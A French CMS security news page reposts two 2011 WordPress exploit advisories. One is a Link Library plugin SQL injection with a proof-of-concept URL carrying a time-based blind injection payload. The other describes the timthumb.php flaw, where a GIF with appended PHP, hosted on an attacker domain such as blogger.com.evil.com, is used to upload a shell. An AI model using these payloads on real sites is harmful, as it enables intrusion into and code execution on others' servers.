Actualités Joomla,Wordpress et Drupal
Actualités sur la sécurité des CMS Joomla, Wordpress et Drupal.
26 Septembre 2011
# Exploit Title: WordPress Link Library plugin <= 5.2.1 SQL Injection Vulnerability
# Date: 2011-09-16
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/link-library.zip
# Version: 5.2.1 (tested)
# Note: magic_quotes has to be turned off
—
PoC
—
http://www.site.com/wp-content/plugins/link-library/link-library-ajax.ph...)/**/AND/**/1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)%23
26 Septembre 2011
# Exploit Title: Multiple Wordpress timthumb.php reuse vulnerabilities
# Date: 09/19/2011
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
---
Description
---
The following Wordpress plugins reuse a vulnerable version of the timthumb.php library.
By hosting a malicious GIF file with PHP code appended to the end on an attacker controlled
domain such as blogger.com.evil.com and then providing it to the script through the
src GET parameter, it is possible to upload a shell and execute arbitrary code on the webserver.